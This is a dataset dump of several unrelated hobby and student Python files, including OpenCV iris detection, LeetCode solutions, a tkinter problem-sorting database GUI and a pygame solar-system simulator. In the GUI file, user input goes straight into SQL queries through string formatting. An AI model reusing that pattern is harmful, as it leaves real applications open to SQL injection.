0.039, 0.04, 0.039, 0.037],\n [0.039, 0.042, 0.042, 0.042, 0.039],\n [0.04, 0.042, 0.043, 0.042, 0.04],\n [0.039, 0.042, 0.042, 0.042, 0.039],\n [0.037, 0.039, 0.04, 0.039, 0.037]])\n\n# img = filtration(img, gauss_matrix)\n\nkernel = np.ones((3, 3), np.uint8)\n_, bin_img_teczowka = cv2.threshold(img, img.mean() / 1.5, 255, cv2.THRESH_BINARY)\n_, bin_img_zrenica = cv2.threshold(img, img.mean() / 4.5, 255, cv2.THRESH_BINARY)\n\nbin_img_teczowka = cv2.morphologyEx(bin_img_teczowka, cv2.MORPH_CLOSE, kernel, iterations=8)\nbin_img_zrenica = cv2.morphologyEx(bin_img_zrenica, cv2.MORPH_CLOSE, kernel, iterations=2)\n\nM = cv2.moments(255 - bin_img_zrenica)\ncX = int(M[\"m10\"] / M[\"m00\"])\ncY = int(M[\"m01\"] / M[\"m00\"])\ncontours, hierarchy = cv2.findContours(bin_img_zrenica, 1, 2)\ncnt = contours[2]\n# cnt = contours[1]\n(x, y), radius = cv2.minEnclosingCircle(cnt)\ncenter = (int(x), int(y))\nradius = int(radius)\nimg = cv2.imread('oko01.png')\nimg = cv2.circle(img, center, radius, (0, 255, 0), 2)\nprint(radius)\ncontours, _ = cv2.findContours(bin_img_teczowka, 1, 2)\ncnt = contours[1]\n(x, y), radius = cv2.minEnclosingCircle(cnt)\ncenter = (int(x), int(y))\nradius = int(radius)\nprint(radius)\n\nimg = cv2.circle(img, center, radius, (0, 0, 255), 2)\n#first option\nimg2 = cv2.linearPolar(img, center=(x, y), maxRadius=52, flags=cv2.WARP_FILL_OUTLIERS)\n#second option\nimg3 = cv2.logPolar(img, center=(x, y), M=52, flags=cv2.WARP_FILL_OUTLIERS)\n\nplt.imshow(img)\nplt.show()\n\nplt.imshow(img2)\nplt.show()\n\nplt.imshow(img3)\nplt.show()\n","repo_name":"Lyudmyla25/Biometria","sub_path":"Lab6/Zad1.py","file_name":"Zad1.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6498579156","text":"N, K = map(int, input().split())\nN2, K2 = N, K\ncount = 0\n\nwhile N != 1:\n count += 1\n if N % K == 0:\n N //= K\n else:\n N -= 1\n\nprint(count)\n\ncount2 = 0\n# subtract in one go so that N becomes a multiple of K\nwhile True:\n # subtract 1 until N is a number divisible by K\n target = (N2 // K2) * K2\n count2 += 
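A quick check of the maxAreaOfIsland record above; the grid values are hypothetical test data, and note the DFS zeroes the grid in place as it visits cells:

    grid = [[0, 1, 0, 0],
            [1, 1, 0, 0],
            [0, 0, 0, 1]]
    print(Solution().maxAreaOfIsland(grid))  # 3: the connected 1s in the top-left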
(N2 - target)\n N2 = target \n # exit the loop once N is smaller than K\n if N2 < K2:\n break\n # divide N by K\n count2 += 1\n N2 //= K2\n\n# subtract 1 at a time from whatever remains\ncount2 += (N2 - 1)\nprint(count2)","repo_name":"zizudana/python-for-coding-test","sub_path":"이코테예제/3-4.py","file_name":"3-4.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33261289504","text":"# -*- coding: utf-8 -*-\n\n# pip install -r requirements.txt\n\nfrom astrobox.space_field import SpaceField\nfrom kochetov import KochetovDrone\n# from vader import VaderDrone\n\nif __name__ == '__main__':\n scene = SpaceField(\n speed=3,\n asteroids_count=15,\n )\n\n k = [KochetovDrone() for _ in range(5)]\n scene.go()\n\n\n# Stage one: passed!\n# Stage two: passed!\n","repo_name":"RodjerWilko/learning_base_diplom","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16027718415","text":"from copy import deepcopy\n\nfrom traitlets import link, directional_link\nimport ipyvuetify as v\nimport sepal_ui.sepalwidgets as sw\n\nfrom component.message import cm\nimport component.widget as cw\nimport component.parameter as cp\n\n\nfrom sepal_ui.frontend.resize_trigger import rt\n\n__all__=[\"StatSettingCard\"]\n\nclass StatSettingCard(cw.Card):\n \"\"\"Statistics settings card. It includes all the required inputs to compute\n and display graphics in the statistics dashboard.\n \"\"\"\n \n def __init__(self, model, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.model = model\n\n title = v.CardTitle(children=[cm.graphs.setting.title])\n\n self.w_variable = sw.Select(\n label=cm.graphs.setting.w_variable.label,\n v_model=\"all\",\n items=[{\"text\": \"All variables\", \"value\": \"all\"}]\n + [\n {\"text\": eval(f\"cm.gfc.{var}\"), \"value\": var}\n for var in list(set(cp.gfc_translation.values()))\n ],\n )\n self.w_years = cw.DateSlider(v_model=self.model.sett_timespan).hide()\n self.w_hybasid = sw.Select(\n label=cm.basin.basinid.label,\n v_model=[],\n items=[],\n small_chips=True,\n multiple=True,\n chips=True,\n deletable_chips=True,\n )\n\n self.children = [\n title,\n self.w_variable,\n self.w_hybasid,\n self.w_years,\n rt,\n ]\n\n # Links\n link((self.w_variable, \"v_model\"), (self.model, \"selected_var\"))\n link((self.w_hybasid, \"v_model\"), (self.model, \"selected_hybasid_chart\"))\n\n # UI Events\n self.w_variable.observe(self.show_years, \"v_model\")\n\n # model Events\n self.w_years.on_event(\"change\", self.years_event)\n self.w_hybasid.observe(self.at_least_one, \"v_model\")\n\n # Fill w_hybasid items when the zonal statistics are calculated\n self.model.observe(self.fill_items ,\"ready\")\n\n def at_least_one(self, change):\n \"\"\"Deactivate the last item when there is only one selected. 
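A worked example for the 3-4.py record above with N=25, K=3: the naive loop walks 25→24→8→7→6→2→1 (6 operations), and the optimized version reaches the same 6 by jumping straight to the nearest multiple of K before each division. A small sketch verifying the naive count:

    def min_ops(n, k):
        # divide by k when possible, otherwise subtract 1; count the steps
        ops = 0
        while n != 1:
            if n % k == 0:
                n //= k
            else:
                n -= 1
            ops += 1
        return ops

    assert min_ops(25, 3) == 6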
Useful\n to avoid showing up graphs without info\"\"\"\n\n widget = change[\"owner\"]\n new_val = change[\"new\"]\n new_items = deepcopy(widget.items)\n\n if len(widget.v_model) == 1:\n\n idx = [\n item[\"index\"] for item in widget.items if item[\"value\"] == new_val[0]\n ][0]\n\n new_items[idx].update(disabled=True)\n elif len(widget.v_model) >= cp.MAX_CATCH_NUMBER:\n\n for item in widget.items:\n if item[\"value\"] not in new_val:\n new_items[item[\"index\"]].update(disabled=True)\n else:\n\n [item.update(disabled=False) for item in new_items]\n \n widget.items = new_items\n\n def fill_items(self, _):\n \"\"\"Fill w_hybasid items once model.ready is True with the inputs step and select the\n first five(5) elements (arbitrary)\"\"\"\n \n method = self.model.method\n if method == \"all\":\n inputs_selection = self.model.hybasin_list\n else: \n inputs_selection = self.model.selected_hybas\n \n \n # Convert into string to graphic purposes \n self.w_hybasid.items = [\n {\"text\": str(val), \"value\": str(val), \"disabled\": False, \"index\": idx}\n for idx, val in enumerate(inputs_selection)\n ]\n\n self.w_hybasid.v_model = [it[\"value\"] for it in self.w_hybasid.items[:5]]\n \n\n def years_event(self, widget, event, data):\n \"\"\"Workaround event (overriding observe) to avoid double calls in slider.\n it will bind selected years with model data.\n \"\"\"\n\n self.model.sett_timespan = data\n\n def show_years(self, change):\n \"\"\"Hide years selection widget when loss is selected\"\"\"\n\n rt.resize()\n\n if change[\"new\"] == \"loss\":\n self.w_years.show()\n else:\n self.w_years.hide()\n\n \n","repo_name":"sepal-contrib/basin-rivers","sub_path":"component/widget/stat_sett_card.py","file_name":"stat_sett_card.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"7109031486","text":"\n#https://leetcode.com/problems/valid-sudoku/submissions/\n\nclass Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n box_hash = collections.defaultdict(set)\n for i in range(len(board)):\n row_hash = set()\n col_hash = set()\n for j in range(len(board[i])):\n if board[i][j] in row_hash and board[i][j] != \".\":\n return False\n row_hash.add(board[i][j])\n\n if board[j][i] in col_hash and board[j][i] != \".\":\n return False\n col_hash.add(board[j][i])\n\n if board[i][j] in box_hash[(i // 3, j // 3)] and board[i][j] != \".\":\n return False\n box_hash[(i // 3, j // 3)].add(board[i][j])\n\n return True\n","repo_name":"aryan619348/DSA_PRACTICE","sub_path":"Arrays and Hashing/Sudoku.py","file_name":"Sudoku.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3571428757","text":"from tkinter import CENTER, Button, Entry, Label, LabelFrame, Listbox, font, S, N, NE, NW, END, Message, Tk, W, E\nfrom PIL import Image, ImageTk\n\nfrom position import Position\nimport os_tinkering\n\n\n\nLIST_WIDTH = 50 if os_tinkering.getOs() != \"Darwin\" else 25\n\n\nclass GUIMenu:\n\n def __init__(self, app):\n self.widgets = {}\n self.app = app\n self.makeMenu()\n\n\n def addWidget(self, name, widget, position):\n self.widgets[name] = (widget, position)\n\n\n def removeWidget(self, name):\n self.widgets.pop(name)\n\n\n def place(self):\n for widget,pos in self.widgets.values():\n if pos.mode == Position.MODE_RELATIVE:\n widget.place(relx = pos.x, rely = pos.y, anchor = pos.anchor)\n elif pos.mode == 
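A usage check for the isValidSudoku record above. The file omits the usual LeetCode preamble, so this sketch assumes the standard imports it relies on implicitly (collections and typing.List); the board contents are toy data:

    import collections
    from typing import List

    board = [["." for _ in range(9)] for _ in range(9)]
    board[0][0] = board[0][8] = "5"           # duplicate in row 0
    print(Solution().isValidSudoku(board))    # False
    board[0][8] = "6"
    print(Solution().isValidSudoku(board))    # True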
Position.MODE_ABSOLUTE:\n widget.place(x = pos.x, y = pos.y, anchor = pos.anchor)\n\n\n def unplace(self):\n for widget, position in self.widgets.values():\n widget.place_forget()\n\n\n def makeMenu(self):\n # base hook; each concrete menu overrides this\n pass\n\n\nclass MainMenu(GUIMenu):\n\n def __init__(self, app):\n super().__init__(app)\n\n\n def makeMenu(self):\n\n self.addWidget(\"searchButton\", Button(self.app.gui, text = \"Start\", \n command = lambda : self.app.changeMenu(SearchMenu(self.app), False)), \n Position(0.3, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"instructionsButton\", Button(self.app.gui, text = \"Instructions\", \n command = lambda : self.app.changeMenu(InfoMenu(self.app), False)),\n Position(0.7, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"menuLabel\", Label(self.app.gui, text = \"Welcome to Problem Sorter\", font = font.Font(size = 30)),\n Position(0.5, 0.1, Position.MODE_RELATIVE, CENTER))\n\n self.image = ImageTk.PhotoImage(Image.open(os_tinkering.IMAGE_PATH))\n\n self.addWidget(\"imageLabel\", Label(image = self.image),\n Position(0.5, 0.5, Position.MODE_RELATIVE, CENTER))\n\n \n\nclass SearchMenu(GUIMenu):\n\n def __init__(self, app):\n super().__init__(app)\n\n\n def makeMenu(self):\n \n # TITLE\n self.addWidget(\"menuLabel\", Label(self.app.gui, text = \"Use/Manage Database\", font = font.Font(size = 26)),\n Position(0.5, 0.1, Position.MODE_RELATIVE, CENTER))\n \n # FRAMES\n self.addWidget(\"themesFrame\", LabelFrame(self.app.gui, text = \"Search Options\", height = 300, width = 400, relief = \"sunken\", labelanchor = N, font = font.Font(size = 18)), \n Position(0.05, 0.15, Position.MODE_RELATIVE, NW))\n self.addWidget(\"resultsFrame\", LabelFrame(self.app.gui, text = \"Results\", height = 300, width = 400, relief = \"sunken\", labelanchor = N, font = font.Font(size = 18)), \n Position(0.95, 0.15, Position.MODE_RELATIVE, NE))\n self.addWidget(\"messageFrame\", LabelFrame(self.app.gui, text = \"Messages\", height = 100, width = 700, relief = \"sunken\", labelanchor = N, font = font.Font(size = 18)),\n Position(0.5, 0.68, Position.MODE_RELATIVE, N))\n\n # LEFTSIDE\n self.addWidget(\"themeListLabel\", Label(self.widgets[\"themesFrame\"][0], text = \"Themes\", font = font.Font(size = 14, underline = True)), \n Position(0.08, 0.08, Position.MODE_RELATIVE, W))\n self.addWidget(\"themeList\", Listbox(self.widgets[\"themesFrame\"][0], height = 10, width = LIST_WIDTH, selectmode = \"multiple\"), \n Position(0.5, 0.85, Position.MODE_RELATIVE, S))\n self.addWidget(\"themeEntry\", Entry(self.widgets[\"themesFrame\"][0], relief = \"sunken\"),\n Position(0.5, 0.1, Position.MODE_RELATIVE, CENTER))\n\n self.initializeThemeList()\n\n # RIGHTSIDE\n self.addWidget(\"resultList\", Listbox(self.widgets[\"resultsFrame\"][0], height = 10, width = LIST_WIDTH), \n Position(0.5, 0.85, Position.MODE_RELATIVE, S))\n self.addWidget(\"resultListLabel\", Label(self.widgets[\"resultsFrame\"][0], text = \"Files\", font = font.Font(size = 14, underline = True)),\n Position(0.08, 0.08, Position.MODE_RELATIVE, W))\n self.addWidget(\"pathEntry\", Entry(self.widgets[\"resultsFrame\"][0], relief = \"sunken\"),\n Position(0.5, 0.1, Position.MODE_RELATIVE, CENTER))\n\n self.addWidget(\"message\", Message(self.app.gui, text = \"Awaiting actions\", width = 600),\n Position(0.2, 0.73, Position.MODE_RELATIVE, NW))\n\n # BUTTONS\n self.addWidget(\"lookupButton\", Button(self.app.gui, text = \"Look up\", \n command = self.lookupCommand),\n Position(0.4, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"deleteButton\", 
Button(self.widgets[\"resultsFrame\"][0], text = \"Remove problem\",\n command = self.removeProblemCommand),\n Position(0.7, 0.925, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"goBack\", Button(self.app.gui, text = \"Go Back\", \n command = lambda : self.app.changeMenu(MainMenu(self.app), False)), \n Position(0.2, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"search\", Button(self.app.gui, text = \"Search Files\",\n command = self.searchCommand),\n Position(0.6, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"reset\", Button(self.app.gui, text = \"Reset\",\n command = self.resetCommand),\n Position(0.8, 0.9, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"addThemeButton\", Button(self.widgets[\"themesFrame\"][0], text = \"Add theme\",\n command = self.addThemeCommand),\n Position(0.3, 0.925, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"removeThemeButton\", Button(self.widgets[\"themesFrame\"][0], text = \"Remove theme\", \n command = self.removeThemeCommand),\n Position(0.7, 0.925, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"addProblemButton\", Button(self.widgets[\"resultsFrame\"][0], text = \"Add problem\", \n command = self.addProblemCommand),\n Position(0.3, 0.925, Position.MODE_RELATIVE, CENTER))\n\n\n def resetCommand(self):\n\n resultList = self.widgets[\"resultList\"][0]\n themeEntry = self.widgets[\"themeEntry\"][0]\n pathEntry = self.widgets[\"pathEntry\"][0]\n message = self.widgets[\"message\"][0]\n\n themeEntry.delete(0, END)\n pathEntry.delete(0, END)\n message.configure(text = \"Awaiting actions\")\n resultList.delete(0, END)\n\n\n def initializeThemeList(self):\n\n getThemesQuery = \"SELECT name FROM Theme;\"\n themeList = self.widgets[\"themeList\"][0]\n\n themeList.delete(0, END)\n\n for line in self.app.db.execute(getThemesQuery):\n themeList.insert(0, line[0])\n\n \n def addThemeCommand(self):\n \n themeEntry = self.widgets[\"themeEntry\"][0]\n theme = self.widgets[\"themeEntry\"][0].get()\n\n themeEntry.delete(0, END)\n insertThemes = \"INSERT INTO Theme (name) VALUES('{theme}');\"\n self.app.db.execute(insertThemes.format(theme = theme))\n self.initializeThemeList()\n self.widgets[\"message\"][0].configure(text = \"Theme added to database\")\n\n \n def removeThemeCommand(self):\n\n themeList = self.widgets[\"themeList\"][0]\n removeTheme = \"DELETE FROM Theme WHERE name = '{theme}';\"\n removeTheme2 = \"DELETE FROM ProblemTheme WHERE EXISTS (SELECT * FROM Theme WHERE id = themeId AND name = '{theme}');\"\n\n for i in themeList.curselection():\n theme = themeList.get(0, END)[i]\n self.app.db.execute(removeTheme2.format(theme = theme))\n self.app.db.execute(removeTheme.format(theme = theme))\n\n self.initializeThemeList()\n self.widgets[\"message\"][0].configure(text = \"Theme removed from database\")\n\n\n def lookupCommand(self):\n\n if len(self.widgets[\"resultList\"][0].curselection()) <= 0:\n self.widgets[\"message\"][0].configure(text = \"No files selected. 
Please select a file\")\n return\n\n\n fileName = self.widgets[\"resultList\"][0].get(0, END)[self.widgets[\"resultList\"][0].curselection()[0]]\n os_tinkering.getFile(fileName)\n \n\n def searchCommand(self):\n\n themeList = self.widgets[\"themeList\"][0]\n resultList = self.widgets[\"resultList\"][0]\n resultSet = set()\n\n query = \"SELECT location FROM Problem;\"\n for path in self.app.db.execute(query):\n resultSet.add(path[0])\n \n if len(themeList.curselection()) > 0:\n query = \"SELECT Problem.location FROM Problem JOIN ProblemTheme JOIN Theme ON Theme.id = ProblemTheme.themeID AND Problem.id = ProblemTheme.problemId AND Theme.name = '{theme}'\"\n for i in themeList.curselection():\n theme = themeList.get(0, END)[i]\n tempSet = set()\n for path in self.app.db.execute(query.format(theme = theme)):\n tempSet.add(path[0])\n resultSet = resultSet.intersection(tempSet)\n\n resultList.delete(0, END)\n\n for path in resultSet:\n resultList.insert(0, path)\n\n self.widgets[\"message\"][0].configure(text = \"Presenting search results\")\n\n\n def removeProblemCommand(self):\n\n if len(self.widgets[\"resultList\"][0].curselection()) <= 0:\n self.widgets[\"message\"][0].configure(text = \"No files selected. Please select a file\")\n return\n\n fileName = self.widgets[\"resultList\"][0].get(0, END)[self.widgets[\"resultList\"][0].curselection()[0]]\n\n query1 = \"DELETE FROM ProblemTheme WHERE ProblemTheme.problemId = (SELECT id FROM Problem WHERE location = '{filename}');\"\n query2 = \"DELETE FROM Problem WHERE location = '{filename}';\"\n\n self.app.db.execute(query1.format(filename = fileName))\n self.app.db.execute(query2.format(filename = fileName))\n\n self.searchCommand()\n self.widgets[\"message\"][0].configure(text = \"File successfully removed from the database\")\n\n\n def addProblemCommand(self):\n \n themeList = self.widgets[\"themeList\"][0]\n\n if len(themeList.curselection()) <= 0:\n self.widgets[\"message\"][0].configure(text = \"No themes selected. 
Please, select a theme from the theme list\")\n return\n\n path = self.widgets[\"pathEntry\"][0].get()\n insertProblem = \"INSERT INTO Problem (location) VALUES('{path}');\".format(path = path)\n insertPT = \"INSERT INTO ProblemTheme (themeId, problemId) VALUES({idT}, {idP});\"\n getThemeIds = \"SELECT id FROM Theme WHERE name = '{theme}';\"\n getProblemId = \"SELECT id FROM Problem WHERE location = '{path}';\".format(path = path)\n\n self.app.db.execute(insertProblem)\n \n themeIds = set()\n\n for i in themeList.curselection():\n theme = themeList.get(0, END)[i]\n themeIds.add(self.app.db.execute(getThemeIds.format(theme = theme))[0][0])\n\n problemId = self.app.db.execute(getProblemId)[0][0]\n\n for i in themeIds:\n self.app.db.execute(insertPT.format(idT = i, idP = problemId))\n\n self.resetCommand()\n\n self.widgets[\"message\"][0].configure(text = \"Database successfully updated\")\n\n \n\n\nclass InfoMenu(GUIMenu):\n\n def __init__(self, app):\n super().__init__(app)\n\n\n def makeMenu(self):\n self.addWidget(\"menuLabel\", Label(self.app.gui, text = \"Instructions\", font = font.Font(size = 26)),\n Position(0.5, 0.1, Position.MODE_RELATIVE, CENTER))\n self.addWidget(\"message\", Message(self.app.gui, width = 800, text = \" - You can search for exercises/exams containing exercises that associate with the themes you selected on the theme list by pressing the 'Search' button.\" +\n \" If no theme is selected, the search will retrieve all file paths registered in the database.\" +\n \" When multiple themes are selected, the files presented are the ones which associate with all of the selected themes.\\n\\n\" + \n \" - You can add new themes by entering their name in the left entry box and pressing the 'Add theme' button. Eliminating them is done by selecting from the theme list the themes you desired to remove and hitting the 'Remove theme' button.\\n\\n\" + \n \" - Adding new file paths to the system is done in a similar manner, but you are required to select the themes you want to associate with the file prior to clicking the 'Add problem' button. 
For one file, multiple themes can be selected.\\n\\n\" + \n \" - If you want to associate a file with one or more new themes, just type the name of the file and proceed as you would to add a new file.\\n\\n\" + \n \" - Reset buttons serve to reset the menu to its initial state, deleting the results of a search for example.\", \n font = font.Font(family = \"Arial\", size = 14)),\n Position(0.1, 0.2, Position.MODE_RELATIVE, NW))\n self.addWidget(\"goBack\", Button(self.app.gui, text = \"Go Back\", \n command = lambda : self.app.changeMenu(MainMenu(self.app), False)), \n Position(0.2, 0.9, Position.MODE_RELATIVE, CENTER))\n\n","repo_name":"marhcouto/problem-sorter","sub_path":"src/gui_menu.py","file_name":"gui_menu.py","file_ext":"py","file_size_in_byte":13326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5476871425","text":"from collections import Counter\n\n\ninitial_polymer = \"KFVHFSSVNCSNHCPCNPVO\"\n\ninsertion_rules = {\n \"KS\": \"O\",\n \"SP\": \"V\",\n \"OH\": \"F\",\n \"VC\": \"P\",\n \"BO\": \"S\",\n \"CV\": \"H\",\n \"FO\": \"N\",\n \"KV\": \"V\",\n \"OV\": \"B\",\n \"NB\": \"K\",\n \"FS\": \"F\",\n \"KB\": \"N\",\n \"HK\": \"C\",\n \"VP\": \"B\",\n \"SV\": \"S\",\n \"FP\": \"P\",\n \"BS\": \"B\",\n \"BP\": \"K\",\n \"OS\": \"K\",\n \"PB\": \"C\",\n \"HB\": \"H\",\n \"VN\": \"S\",\n \"FB\": \"C\",\n \"OC\": \"N\",\n \"OO\": \"F\",\n \"PC\": \"O\",\n \"FK\": \"K\",\n \"OP\": \"V\",\n \"BH\": \"C\",\n \"NP\": \"C\",\n \"KF\": \"H\",\n \"SK\": \"F\",\n \"HN\": \"O\",\n \"CB\": \"O\",\n \"SN\": \"N\",\n \"VF\": \"S\",\n \"KC\": \"H\",\n \"HF\": \"V\",\n \"NC\": \"P\",\n \"BN\": \"F\",\n \"KO\": \"C\",\n \"PS\": \"B\",\n \"HO\": \"S\",\n \"CH\": \"O\",\n \"KP\": \"K\",\n \"VK\": \"V\",\n \"BB\": \"V\",\n \"BF\": \"P\",\n \"CS\": \"K\",\n \"CN\": \"H\",\n \"PK\": \"C\",\n \"SH\": \"O\",\n \"BC\": \"H\",\n \"FN\": \"N\",\n \"BK\": \"N\",\n \"PN\": \"B\",\n \"PO\": \"O\",\n \"SC\": \"S\",\n \"NO\": \"S\",\n \"KN\": \"O\",\n \"VB\": \"C\",\n \"SF\": \"H\",\n \"FH\": \"C\",\n \"FF\": \"B\",\n \"VO\": \"S\",\n \"PH\": \"F\",\n \"CK\": \"B\",\n \"FC\": \"P\",\n \"VV\": \"F\",\n \"VH\": \"O\",\n \"OF\": \"O\",\n \"HP\": \"K\",\n \"CO\": \"V\",\n \"VS\": \"V\",\n \"SB\": \"F\",\n \"SS\": \"K\",\n \"CF\": \"O\",\n \"OK\": \"V\",\n \"ON\": \"B\",\n \"NS\": \"H\",\n \"SO\": \"B\",\n \"NV\": \"V\",\n \"NH\": \"B\",\n \"NN\": \"K\",\n \"KH\": \"H\",\n \"FV\": \"B\",\n \"KK\": \"N\",\n \"OB\": \"F\",\n \"NK\": \"F\",\n \"CC\": \"S\",\n \"PP\": \"B\",\n \"PF\": \"H\",\n \"HC\": \"P\",\n \"PV\": \"F\",\n \"BV\": \"N\",\n \"NF\": \"N\",\n \"HV\": \"S\",\n \"HH\": \"C\",\n \"HS\": \"O\",\n \"CP\": \"O\",\n}\n\n\ninitial_pairs = {}\nfor i in range(len(initial_polymer) - 1):\n pair = f\"{initial_polymer[i]}{initial_polymer[i+1]}\"\n initial_pairs[pair] = initial_pairs.get(pair, 0) + 1\n\n\ndef compute_next_polymer2(polymer):\n new_polymer = {}\n for pair in polymer:\n if pair in insertion_rules:\n number_of_pair = polymer[pair]\n # Get new element\n new_element = insertion_rules[pair]\n\n # Add pairs with first element and new element\n new_pair_with_first_element = f\"{pair[0]}{new_element}\"\n new_polymer[new_pair_with_first_element] = (\n new_polymer.get(new_pair_with_first_element, 0) + number_of_pair\n )\n\n # Add pairs with new element and second element\n new_pair_with_second_element = f\"{new_element}{pair[1]}\"\n new_polymer[new_pair_with_second_element] = (\n new_polymer.get(new_pair_with_second_element, 0) + number_of_pair\n )\n 
else:\n new_polymer[pair] = polymer[pair]\n\n return new_polymer\n\n\ndef grow_polymer(initial_polymer, steps):\n initial_pairs = {}\n for i in range(len(initial_polymer) - 1):\n pair = f\"{initial_polymer[i]}{initial_polymer[i+1]}\"\n initial_pairs[pair] = initial_pairs.get(pair, 0) + 1\n\n polymer_map = dict(initial_pairs)\n for i in range(steps):\n polymer_map = compute_next_polymer2(polymer_map)\n\n element_counts = {}\n for pair in polymer_map:\n count = polymer_map[pair]\n element_counts[pair[0]] = element_counts.get(pair[0], 0) + count\n element_counts[pair[1]] = element_counts.get(pair[1], 0) + count\n\n # Add one to account for first and last char\n element_counts[initial_polymer[0]] = element_counts[initial_polymer[0]] + 1\n element_counts[initial_polymer[-1]] = element_counts[initial_polymer[-1]] + 1\n\n element_counts = sorted(list(Counter(element_counts).values()))\n print((element_counts[-1] - element_counts[0]) / 2)\n\n\ngrow_polymer(initial_polymer, 10)\n\ngrow_polymer(initial_polymer, 40)\n","repo_name":"jrochette/recipebook","sub_path":"advent_of_code_day14.py","file_name":"advent_of_code_day14.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31354456096","text":"\"\"\"\nA *.txt text file contains only uppercase Latin letters (ABC…Z). \nDetermine the maximum number of consecutive characters among which the character combination NO does not occur\n\"\"\"\n\nf = open(\"\").read()\nf = f.replace(\"NO\", \"N O\")\nf = f.split(\" \")\nf = max([len(i) for i in f])\n\nprint(f)","repo_name":"Munkushi/infa-ege","sub_path":"number_24/x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29788286994","text":"import pygame, math\r\nfrom sys import exit\r\n\r\n# pygame initialisation\r\npygame.init()\r\nWIDTH, HEIGHT = 1000, 1000\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\r\npygame.display.set_caption('Planet Simulator')\r\nFPS = 60\r\n\r\n# colours\r\nWHITE = (255, 255, 255)\r\nYELLOW = (255, 255, 0)\r\nBLUE = (100, 149, 237)\r\nRED = (188, 39, 50)\r\nDARK_GREY = (80, 78, 81)\r\n\r\n# planet class\r\nclass Planet():\r\n AU = 1.496e+8 * 1000\r\n G = 6.67428e-11\r\n SCALE = 15 / AU # 1 AU = 15 px\r\n TIMESTEP = 3600 * 24 * 7 # 1 week\r\n\r\n def __init__(self, x, y, radius, color, mass):\r\n self.x = x\r\n self.y = y\r\n self.radius = radius\r\n self.color = color\r\n self.mass = mass\r\n\r\n self.vel_x = 0\r\n self.vel_y = 0\r\n\r\n self.sun = False\r\n self.distance_to_sun = 0\r\n self.orbit = []\r\n \r\n def draw(self, screen):\r\n x = self.x * self.SCALE + WIDTH//2\r\n y = self.y * self.SCALE + HEIGHT//2\r\n\r\n if len(self.orbit) > 2:\r\n del self.orbit[:-10000]\r\n updated_points = [(x * self.SCALE + WIDTH//2, y * self.SCALE + HEIGHT//2) for x, y in self.orbit]\r\n pygame.draw.lines(screen, self.color, False, updated_points, 2)\r\n\r\n pygame.draw.circle(screen, self.color, (x,y), self.radius)\r\n\r\n def attraction(self, other):\r\n dist_x = other.x - self.x\r\n dist_y = other.y - self.y\r\n distance = math.sqrt(dist_x**2 + dist_y**2)\r\n\r\n if other.sun:\r\n self.distance_to_sun = distance\r\n \r\n force = (self.G * self.mass * other.mass) / distance**2\r\n theta = math.atan2(dist_y, dist_x)\r\n force_x = math.cos(theta) * force\r\n force_y = math.sin(theta) * force\r\n\r\n return force_x, force_y\r\n \r\n def update_pos(self, 
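The replace-then-split trick in the fixed number_24/x.py snippet above, traced on a tiny input: inserting a space inside every "NO" cuts the text exactly at the forbidden pairs, so the longest space-free piece is the longest run containing no "NO".

    s = "ABNOXYNOZ"
    pieces = s.replace("NO", "N O").split(" ")
    print(pieces)                        # ['ABN', 'OXYN', 'OZ']
    print(max(len(p) for p in pieces))   # 4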
planets):\r\n ttl_fx = ttl_fy = 0\r\n for planet in planets:\r\n if self == planet:\r\n continue\r\n fx, fy = self.attraction(planet)\r\n ttl_fx += fx\r\n ttl_fy += fy\r\n \r\n self.vel_x += (ttl_fx / self.mass) * self.TIMESTEP\r\n self.vel_y += (ttl_fy / self.mass) * self.TIMESTEP\r\n\r\n self.x += self.vel_x * self.TIMESTEP\r\n self.y += self.vel_y * self.TIMESTEP\r\n self.orbit.append((self.x, self.y))\r\n\r\n\r\n# main\r\ndef main():\r\n clock = pygame.time.Clock()\r\n\r\n # initialise planets\r\n sun = Planet(0, 0, 30, YELLOW, 1.9891 * 10**30)\r\n sun.sun = True\r\n \r\n mercury = Planet(-0.387 * Planet.AU, 0, 16, DARK_GREY, 3.285 * 10**23)\r\n mercury.vel_y = 47.4 * 1000\r\n venus = Planet(-0.7 * Planet.AU, 0, 16, WHITE, 4.867 * 10**24)\r\n venus.vel_y = 35.02 * 1000\r\n earth = Planet(-1 * Planet.AU, 0, 16, BLUE, 5.97219 * 10**24)\r\n earth.vel_y = 29.783 * 1000\r\n mars = Planet(-1.5 * Planet.AU, 0, 12, RED, 6.39 * 10**23)\r\n mars.vel_y = 24.077 * 1000\r\n jupiter = Planet(-5.2 * Planet.AU, 0, 30, 'brown', 1.898 * 10**27)\r\n jupiter.vel_y = 13.06 * 1000\r\n saturn = Planet(-9.5 * Planet.AU, 0, 30, 'antiquewhite3', 5.683 * 10**26)\r\n saturn.vel_y = 9.68 * 1000\r\n uranus 